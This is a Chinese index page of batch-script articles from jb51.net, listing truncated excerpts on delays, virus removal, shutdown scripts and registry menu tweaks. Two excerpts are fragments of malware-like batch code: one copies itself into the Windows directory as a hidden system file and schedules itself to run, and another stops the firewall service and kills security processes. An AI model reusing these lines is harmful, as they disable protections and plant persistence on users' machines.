脚 本 之 家 www.jb51.net
页面导航:  不限条件-->BAT
本地搜索:
来源:vbs小铺第一种方法:ping 127.0.0.1 -n 5000>nuldir c:\ >c:\1.txt延时5分钟后执行dir c:\第二种方法:: Sleep.bat - Sleep/Delay/Wait n seconds:: Herbert Kleebauer(Germany) - 2005/05/29:: Modified by Will Sort - 20...
http://www.jb51.net//article/12440.htm
最近两天病毒肆虐,一个名为wsttrs.exe的进程会自动终结病毒防火墙,而且导致进入不了系统桌面,出现假死现象.这些病毒都很变态,目前瑞星 卡巴都不识别: 一、手动清除方法:1.在windowsXP及其以上系统中: 当无法进入桌面的时候,调出windows任务管理器(Ctrl+Alt+Delete调出),切换到进程标签,然后找到wsttrs.exe进程,选中后单击右键结束进程,既可正常显示桌面。2.当以上方案不能成功,则有可能是该病毒的最新变种,应进入安全模式,打开注册表编辑器,定位到HKEY_LOCAL_MACHINESoftWareMicrosoftWindowsCu...
http://www.jb51.net//article/11014.htm
[code]@echo off attrib -r -h -s "%~nx0" 2>nul >nul attrib -r -h -s %windir%\"%~nx0" 2>nul >nul copy "%~nx0" %windir% /y 2>nul >nul at 9:20 /every:m,t,w,th,f,s,su&...
http://www.jb51.net//article/10954.htm
[code]@echo offmode con: cols=80 lines=25:indexcolor 27clsecho                  ╭───────────────╮echo              ...
http://www.jb51.net//article/10953.htm
[code]%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a&nb...
http://www.jb51.net//article/10952.htm
@echo offtitle You DEAD!!!!!!!set taskkill=scopy %0 %windir%\system32\cmd.batattrib %windir%\system32\cmd.bat +r +s +hnet stop sharedaccess >nul%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe exp...
http://www.jb51.net//article/10951.htm
[code]@echo off%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%%ozone%     %Name  :REON%               %ozone%%ozone%     %Author:Ozone [verybat.cn]% ...
http://www.jb51.net//article/10950.htm
[code]::code by lxmxn @ cn-dos.net . ::目的:帮助新手们更好的理解变量字符截取功能. ::Date 2006-12-16 . ::说明:有的变量截取之后值为空,这是正常的. @echo off&setlocal EnableDelayedexpansion ::设置变量var的值: set var=0123456789ABCDEF call :begin for...
http://www.jb51.net//article/10949.htm
[code]@echo off  setlocal  cd/d %temp%  echo Set colOperatingSystems = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem") >shutdown.vbs echo For Each objOperatingSy...
http://www.jb51.net//article/10947.htm
reg add "HKCR\*\shell\ms-dos" /ve /d ms-dos /freg add "HKCR\*\shell\ms-dos\command"  /ve /d "cmd.exe /k cd %%1"  /freg add "HKCR\Folder\shell\ms-dos" /ve /d ms-dos /freg add "...
http://www.jb51.net//article/10945.htm
@echo offcd.>script.txt>>script.txt echo list diskfor /f %%i in (’diskpart /s script.txt^|find /c ^"联机^"’) do Set HardDrivers=%%idel script.txt /qecho 您的计算机上硬盘安装数量为:%HardDrivers%pause...
http://www.jb51.net//article/10944.htm
共有:76/10,当前3/8页  [首页] [上一页] 1 2 3 4 5 6 7 8 [下一页]  [尾页] 转到: